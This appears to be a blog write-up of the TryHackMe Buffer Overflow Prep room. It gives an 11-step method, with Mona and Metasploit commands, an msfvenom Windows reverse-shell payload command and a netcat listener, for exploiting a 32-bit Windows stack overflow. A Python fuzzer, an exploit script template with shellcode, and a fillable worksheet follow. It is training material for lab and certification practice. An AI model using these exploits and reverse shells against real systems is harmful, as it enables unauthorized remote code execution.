<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=a7562a429deda9d5a30bfba072201342160534eb">
    <link rel="shortcut icon" type="image/png" href="http://0.0.0.0:4000/assets/images/shinris3n.png">

<!-- Begin Jekyll SEO tag v2.6.1 -->
<title>Buffer Overflow Prep | 当て身 Atemi</title>
<meta name="generator" content="Jekyll v3.9.0" />
<meta property="og:title" content="Buffer Overflow Prep" />
<meta name="author" content="shinris3n" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="A Cybersecurity blog by shinris3n 👊 Writeups 👊 News 👊 Resources" />
<meta property="og:description" content="A Cybersecurity blog by shinris3n 👊 Writeups 👊 News 👊 Resources" />
<link rel="canonical" href="http://0.0.0.0:4000/writeups/resources/2021/06/13/TryHackMe-BOF-Prep.html" />
<meta property="og:url" content="http://0.0.0.0:4000/writeups/resources/2021/06/13/TryHackMe-BOF-Prep.html" />
<meta property="og:site_name" content="当て身 Atemi" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-06-13T16:13:21-05:00" />
<script type="application/ld+json">
{"author":{"@type":"Person","name":"shinris3n"},"url":"http://0.0.0.0:4000/writeups/resources/2021/06/13/TryHackMe-BOF-Prep.html","@type":"BlogPosting","description":"A Cybersecurity blog by shinris3n 👊 Writeups 👊 News 👊 Resources","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/writeups/resources/2021/06/13/TryHackMe-BOF-Prep.html"},"headline":"Buffer Overflow Prep","dateModified":"2021-06-13T16:13:21-05:00","datePublished":"2021-06-13T16:13:21-05:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <h1><a href = '/' style = "text-decoration:none;color:#b5e853;" >当て身 Atemi</a></h1>
        <h2>A Cybersecurity blog by shinris3n <br> 👊 <a href = "/writeups">Writeups</a> 👊 <a href = "/news">News</a> 👊 <a href = "/resources">Resources</a> <br></h2>
        <h5>Part of the <a href="https://www.ninpwn.com" target="_blank">Ninpwn</a> Network</h5>
      </div>
    </header>

    <div class="container">
      <a href="http://0.0.0.0:4000"><img src="http://0.0.0.0:4000/assets/images/shinris3n_banner_transparent.png" width="25%" height="25%" alt="shinris3n" title="shinris3n home page link"></a>
      <section id="main_content">
        <h5><a href="#" onclick="history.go(-1)"> &lt;&lt; back </a></h5><br>


<small>13 June 2021</small>
<h1>Buffer Overflow Prep</h1>




 <small><font color="b5e853">Challenge Source: <em>TryHackMe</em></font></small>

<br>

  <small><font color="b5e853">Challenge Category: <em>Buffer Overflows</em></font></small>


<p><a href="https://tryhackme.com/" target="_blank"><img src="/assets/writeups/TryHackMe/THMlogo.png" width="225" /></a></p>

<h1 id="11-step-process-for-exploiting-a-windows-32-bit-application-buffer-overflow-">11 Step Process for Exploiting a Windows 32-Bit Application Buffer Overflow <br /></h1>

<h4 id="procedure-and-worksheet-based-on-material-from-the-tib3rius-buffer-overflow-prep-try-hack-me-room">(Procedure and Worksheet based on Material from the Tib3rius <a href="https://tryhackme.com/room/bufferoverflowprep" target="_blank">Buffer Overflow Prep</a> Try Hack Me Room)</h4>

<h2 id="table-of-contents"><a name="toc"></a>Table of Contents</h2>

<ol>
  <li><a href="#tools">Tools</a></li>
  <li><a href="#process">Process with Example Commands and Output</a></li>
  <li><a href="#applications">List of Example Commands by Application</a></li>
  <li><a href="#fuzzer">Python 3 Fuzzer Script Template</a></li>
  <li><a href="#exploit">Python 3 Exploit Script Template</a></li>
  <li><a href="#worksheet">OSCP Friendly Manual BOF Exploit Worksheet</a></li>
</ol>

<div style="page-break-after: always; visibility: hidden"> \pagebreak </div>

<hr />

<h2 id="tools"><a name="tools"></a>Tools</h2>

<ul>
  <li>Immunity Debugger with Mona Plugin</li>
  <li>Metasploit Framework</li>
  <li>Python 3 fuzzer and exploit script templates (found below)</li>
  <li>XFreeRDP</li>
  <li>Netcat</li>
</ul>

<p><a href="#toc">Return to Table of Contents</a></p>

<hr />

<div style="page-break-after: always; visibility: hidden"> \pagebreak </div>

<h2 id="process-with-example-commands-and-output"><a name="process"></a>Process with Example Commands and Output</h2>

<p><strong>Step 1</strong> - Open an RDP session to the target machine, if applicable then run the vulnerable application and fuzz to find the general range of the EIP register offset at the point of the application crashing.</p>

<p><code class="language-plaintext highlighter-rouge">xfreerdp /u:admin /p:password /cert:ignore /v:10.10.11.33 /workarea</code></p>

<p><code class="language-plaintext highlighter-rouge">python3 fuzzer.py</code></p>

<p><strong>Step 2</strong> - Create a pattern that’s 400 characters over the estimated offset via metasploit.</p>

<p><code class="language-plaintext highlighter-rouge">/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1700</code></p>

<p><strong>Step 3</strong> - Modify exploit script with the target ip and port, pattern as the payload, offset = 0, retn = “”, padding = “”, postfix = “”.</p>

<p><strong>Step 4</strong> - Open Immunity Debugger (running as admin) and load the vulnerable application, then use Mona to find the exact EIP offset.</p>

<p><code class="language-plaintext highlighter-rouge">!mona findmsp -distance 1100</code></p>

<p><img src="/assets/writeups/TryHackMe/BOFPrep/076f8fddebb340d0bd9c788ecade2743.png" alt="91eed7279aec31c58183ac4f1d1b56d3.png" /></p>

<p><strong>Step 5</strong> - Verify the offset value by updating and running exploit.py with no payload, the found offset value, and a return address string (“e.g. BCDE”) to check for EIP overwrite.</p>

<p><img src="/assets/writeups/TryHackMe/BOFPrep/55c279c6b2724a61973b20832f27ebd0.png" alt="bce6ef0f3b0529f9ad73f69fe5074110.png" /></p>

<p><strong>Step 6</strong> - Use Mona to generate a bad character set, excluding \x00, update exploit.py then run it, noting the ESP register value.</p>

<p><code class="language-plaintext highlighter-rouge">!mona config -set workingfolder c:\mona\%p</code>
<code class="language-plaintext highlighter-rouge">!mona bytearray -b "\x00"</code></p>

<p><img src="/assets/writeups/TryHackMe/BOFPrep/8ef8c60148f9480e98a83849f2bc1f4b.png" alt="911f323f12a625db489113b17199229a.png" /></p>

<p><strong>Step 7</strong> - Use Mona to find possible bad characters with a comparison between the byte array and ESP.</p>

<p><code class="language-plaintext highlighter-rouge">!mona compare -f C:\mona\oscp\bytearray.bin -a 0192FA30</code></p>

<p><strong>Step 8</strong> - Update the byte array and payload to exclude all possible bad characters, then run the exploit followed by a Mona comparison to find bad characters.  Remove identified bad characters (ignoring the second of adjacent bytes that are flagged as bad, as this may not be the case) and repeat the process until all bad characters have been eliminated.</p>

<p><img src="/assets/writeups/TryHackMe/BOFPrep/92ad0e178a52488cbb8131f1d5c37a28.png" alt="5792de7cc1861f92bb50d7d596a32401.png" /></p>

<p><code class="language-plaintext highlighter-rouge">!mona bytearray -b "\x00\x11\x40\x5f\xb8\xee"</code></p>

<p><code class="language-plaintext highlighter-rouge">!mona compare -f C:\mona\oscp\bytearray.bin -a 017CFA30</code> (Update the ESP address after each crash)</p>

<p><img src="/assets/writeups/TryHackMe/BOFPrep/3dfe0c17cab748fbbd4a848a9a6ae22d.png" alt="0d6965704c28259558dd0dd352f5e571.png" /></p>

<p><strong>Step 9</strong> - Find a JMP point using Mona and update the RETN variable in the exploit script accordingly.</p>

<p><code class="language-plaintext highlighter-rouge">!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"</code></p>

<p><img src="/assets/writeups/TryHackMe/BOFPrep/4067cd8d3e8f4249ab4b7cc32db2f634.png" alt="5f1b0a5b192ec6f30b3bed16b0b1c387.png" /></p>

<p><code class="language-plaintext highlighter-rouge">retn = "\x03\x12\x50\x62"</code> (Little Endian)</p>

<p><strong>Step 10</strong> - Generate an MSF reverse shell payload (excluding all bad characters identified) and replace the payload value in exploit.py, along with NOP (\x90) padding of at least 16 bytes.</p>

<p><code class="language-plaintext highlighter-rouge">msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -f c</code></p>

<p><strong>Step 11</strong> - Open up a Netcat listener and run the exploit for reverse shell.</p>

<p><code class="language-plaintext highlighter-rouge">nc -nvlp 4444</code></p>

<p><img src="/assets/writeups/TryHackMe/BOFPrep/5b5558e9b28244c69fac2f0b73b994cc.png" alt="49f1b60f4a406df4a7ec27ae5e868cc0.png" /></p>

<p><a href="#toc">Return to Table of Contents</a></p>

<hr />

<div style="page-break-after: always; visibility: hidden"> \pagebreak </div>

<h2 id="list-of-example-commands-by-application"><a name="applications"></a>List of Example Commands by Application</h2>

<h3 id="rdp">RDP:</h3>
<p><code class="language-plaintext highlighter-rouge">xfreerdp /u:admin /p:password /cert:ignore /v:10.10.11.33 /workarea</code></p>

<h3 id="metasploit">Metasploit:</h3>
<p><code class="language-plaintext highlighter-rouge">/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600</code></p>

<h3 id="mona">Mona:</h3>
<p>Set Working Folder Path - <code class="language-plaintext highlighter-rouge">!mona config -set workingfolder c:\mona\%p</code></p>

<p>Find EIP offset - <code class="language-plaintext highlighter-rouge">!mona findmsp -distance 1100</code></p>

<p>Generate a Byte Array Excluding Bad Chars - <code class="language-plaintext highlighter-rouge">!mona bytearray -b "\x00\x09"</code></p>

<p>Find Bad Characters - <code class="language-plaintext highlighter-rouge">!mona compare -f C:\mona\oscp\bytearray.bin -a 01A0FA30</code></p>

<p>Find JMP ESP spots Excluding Bad Chars - <code class="language-plaintext highlighter-rouge">!mona jmp -r esp -cpb "\x00\x23\x24\x3c\x3d\x83\x84\xba\xbb"</code></p>

<p>Generate a Shellscript Excluding Bad Chars - <code class="language-plaintext highlighter-rouge">msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f c</code></p>

<h3 id="basic-netcat-listener-for-reverse-shell">Basic Netcat Listener for Reverse Shell:</h3>
<p><code class="language-plaintext highlighter-rouge">nc -nvlp 4444</code></p>

<p><a href="#toc">Return to Table of Contents</a></p>

<hr />

<div style="page-break-after: always; visibility: hidden"> \pagebreak </div>

<h2 id="python-3-fuzzer-script-template"><a name="fuzzer"></a>Python 3 Fuzzer Script Template</h2>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">import</span> <span class="nn">socket</span><span class="p">,</span> <span class="n">time</span><span class="p">,</span> <span class="n">sys</span>

<span class="n">ip</span> <span class="o">=</span> <span class="s">"10.10.98.22"</span>

<span class="n">port</span> <span class="o">=</span> <span class="mi">1337</span>
<span class="n">timeout</span> <span class="o">=</span> <span class="mi">5</span>
<span class="n">prefix</span> <span class="o">=</span> <span class="s">"OVERFLOW2 "</span> <span class="c1"># This specific input is necessary for the THM room exercises
</span>
<span class="n">string</span> <span class="o">=</span> <span class="n">prefix</span> <span class="o">+</span> <span class="s">"A"</span> <span class="o">*</span> <span class="mi">100</span>

<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
  <span class="k">try</span><span class="p">:</span>
    <span class="k">with</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="k">as</span> <span class="n">s</span><span class="p">:</span>
      <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="n">timeout</span><span class="p">)</span>
      <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">ip</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
      <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
      <span class="k">print</span><span class="p">(</span><span class="s">"Fuzzing with {} bytes"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">string</span><span class="p">)</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">prefix</span><span class="p">)))</span>
      <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">string</span><span class="p">,</span> <span class="s">"latin-1"</span><span class="p">))</span>
      <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
  <span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Fuzzing crashed at {} bytes"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">string</span><span class="p">)</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">prefix</span><span class="p">)))</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
  <span class="n">string</span> <span class="o">+=</span> <span class="mi">100</span> <span class="o">*</span> <span class="s">"A"</span>
  <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span></code></pre></figure>

<p><a href="#toc">Return to Table of Contents</a></p>

<hr />

<div style="page-break-after: always; visibility: hidden"> \pagebreak </div>

<h2 id="python-3-exploit-script-template"><a name="exploit"></a>Python 3 Exploit Script Template</h2>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">socket</span>

<span class="n">ip</span> <span class="o">=</span> <span class="s">"10.10.98.22"</span>
<span class="n">port</span> <span class="o">=</span> <span class="mi">1337</span>

<span class="n">prefix</span> <span class="o">=</span> <span class="s">"OVERFLOW2 "</span> <span class="c1"># This specific input is necessary for the THM room exercises
</span><span class="n">offset</span> <span class="o">=</span> <span class="mi">634</span>
<span class="n">overflow</span> <span class="o">=</span> <span class="s">"A"</span> <span class="o">*</span> <span class="n">offset</span>
<span class="n">retn</span> <span class="o">=</span> <span class="s">"</span><span class="se">\xaf\x11\x50\x62</span><span class="s">"</span>
<span class="n">padding</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span> <span class="o">*</span> <span class="mi">16</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">(</span><span class="s">"</span><span class="se">\xfc\xbb\x17\x74\x72\x5e\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xeb\x9c\xf0\x5e\x13</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x90\x48\xf4\xd4\x90\x6e\x0a\xd7</span><span class="s">"</span>
<span class="p">)</span>
<span class="n">postfix</span> <span class="o">=</span> <span class="s">""</span>

<span class="nb">buffer</span> <span class="o">=</span> <span class="n">prefix</span> <span class="o">+</span> <span class="n">overflow</span> <span class="o">+</span> <span class="n">retn</span> <span class="o">+</span> <span class="n">padding</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">postfix</span>

<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>

<span class="k">try</span><span class="p">:</span>
  <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">ip</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
  <span class="k">print</span><span class="p">(</span><span class="s">"Sending evil buffer..."</span><span class="p">)</span>
  <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="nb">buffer</span> <span class="o">+</span> <span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">,</span> <span class="s">"latin-1"</span><span class="p">))</span>
  <span class="k">print</span><span class="p">(</span><span class="s">"Done!"</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
  <span class="k">print</span><span class="p">(</span><span class="s">"Could not connect."</span><span class="p">)</span></code></pre></figure>

<p><a href="#toc">Return to Table of Contents</a></p>

<hr />

<div style="page-break-after: always; visibility: hidden"> \pagebreak </div>

<h2 id="oscp-friendly-manual-bof-exploit-worksheet"><a name="worksheet"></a>OSCP Friendly Manual BOF Exploit Worksheet</h2>

<ul>
  <li>
    <p><input type="checkbox" unchecked="" /> Step 1 - Open an RDP session to the target machine, if applicable then run the vulnerable application and fuzz to find the general range of the EIP register offset at the point of the application crashing.</p>

    <p><code class="language-plaintext highlighter-rouge">python3 fuzzer.py</code></p>

    <p><mark>Crashed at <input type="number" id="estoffset" name="estoffset" value=" " /> bytes. <br /> Add 400 to the value entered above: <input type="number" id="estoffsetplus" name="estoffsetplus" value=" " /><br />(Substitute for XXXX in code segments below)</mark></p>
  </li>
  <li>
    <p><input type="checkbox" unchecked="" /> Step 2 - Create a pattern that’s 400 characters over the estimated offset via metasploit.</p>

    <p><code class="language-plaintext highlighter-rouge">/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l XXXX</code></p>
  </li>
  <li>
    <p><input type="checkbox" unchecked="" /> Step 3 - Modify exploit script with the target ip and port, pattern as the payload, offset = 0, retn = “”, padding = “”, postfix = “”.</p>
  </li>
  <li>
    <p><input type="checkbox" unchecked="" /> Step 4 - Open Immunity Debugger (running as admin) and load the vulnerable application, then use Mona to find the exact EIP offset.</p>

    <p><code class="language-plaintext highlighter-rouge">!mona findmsp -distance XXXX</code></p>

    <p><mark>Exact Offset = <input type="number" id="offset" name="offset" value=" " /> <br />(Substitute for PPPP in code segments below)</mark></p>
  </li>
  <li>
    <p><input type="checkbox" unchecked="" /> Step 5 - Verify the offset value by updating and running exploit.py with no payload, the found offset value, and a return address string (“e.g. BCDE”) to check for EIP overwrite.</p>

    <p><code class="language-plaintext highlighter-rouge">python3 exploit.py</code></p>
  </li>
  <li>
    <p><input type="checkbox" unchecked="" /> Step 6 - Use Mona to generate a bad character set, excluding \x00, update exploit.py then run it, noting the ESP register value.</p>

    <p><code class="language-plaintext highlighter-rouge">!mona config -set workingfolder c:\mona\%p</code></p>

    <p><code class="language-plaintext highlighter-rouge">!mona bytearray -b "\x00"</code></p>

    <p><mark>ESP = 0x<input type="text" id="esp" name="esp" value=" " /> <br />(Substitute for YYYYYYYY in code segments below)</mark></p>
  </li>
  <li>
    <p><input type="checkbox" unchecked="" /> Step 7 - Use Mona to find possible bad characters with a comparison between the byte array and ESP.</p>

    <p><code class="language-plaintext highlighter-rouge">!mona compare -f C:\mona\oscp\bytearray.bin -a YYYYYYYY</code></p>
  </li>
  <li>
    <p><input type="checkbox" unchecked="" /> Step 8 - Update the byte array and payload to exclude all possible bad characters, then run the exploit followed by a Mona comparison to find bad characters. Remove identified bad characters (ignoring the second of adjacent bytes that are flagged as bad, as this may not be the case) and repeat the process until all bad characters have been eliminated.</p>

    <p><mark>Bad Character Array = "\x00\ <input type="text" id="badchars" name="badchars" value=" " /><br />(Substitute for "\x00\x??\x??\x??" in code segments below)</mark></p>

    <p><code class="language-plaintext highlighter-rouge">!mona bytearray -b "\x00\x??\x??\x??"</code></p>

    <p><code class="language-plaintext highlighter-rouge">python3 exploit.py</code></p>

    <p><mark>New ESP = 0x<input type="text" id="newesp" name="newesp" value=" " /> <br />(Substitute for ZZZZZZZZ in code segments below)</mark></p>

    <p><code class="language-plaintext highlighter-rouge">!mona compare -f C:\mona\oscp\bytearray.bin -a ZZZZZZZZ</code> (Update the ESP address after each crash)</p>
  </li>
  <li>
    <p><input type="checkbox" unchecked="" /> Step 9 - Find a JMP point using Mona and update the RETN variable in the exploit script accordingly.</p>

    <p><code class="language-plaintext highlighter-rouge">!mona jmp -r esp -cpb "\x00\x??\x??\x??"</code></p>

    <p><mark>Chosen return address = 0x<input type="text" id="retn" name="retn" value=" " /> <br />(Substitute for 0xTHISADDR in code segments below)</mark></p>

    <p><code class="language-plaintext highlighter-rouge">retn = "\xDR\xAD\xIS\xTH"</code> (Little Endian format for 0xTHISADDR)</p>
  </li>
  <li>
    <p><input type="checkbox" unchecked="" /> Step 10 - Generate an MSF reverse shell payload (excluding all bad characters identified) and replace the payload value in exploit.py, along with NOP (\x90) padding of at least 16 bytes.</p>

    <p><mark>Your IP Address = <input type="text" id="ipaddr" name="ipaddr" value="" /> <br />(Substitute for 127.0.0.1 in code segments below)</mark><br /><br />
  <mark>Your Listener Port = <input type="text" id="listener" name="listener" value="" /> <br />(Substitute for 4444 in code segments below)</mark></p>

    <p><code class="language-plaintext highlighter-rouge">msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 EXITFUNC=thread -b "\x00\x??\x??\??" -f c</code></p>
  </li>
  <li>
    <p><input type="checkbox" unchecked="" /> Step 11 - Open up a Netcat listener and run the exploit for reverse shell.</p>

    <p><code class="language-plaintext highlighter-rouge">nc -nvlp 4444</code></p>
  </li>
</ul>

<p><a href="#toc">Return to Table of Contents</a></p>

<hr />



  <small>Tags: <em>TryHackMe</em></small>


      </section>
    </div>

    
  </body>
</html>
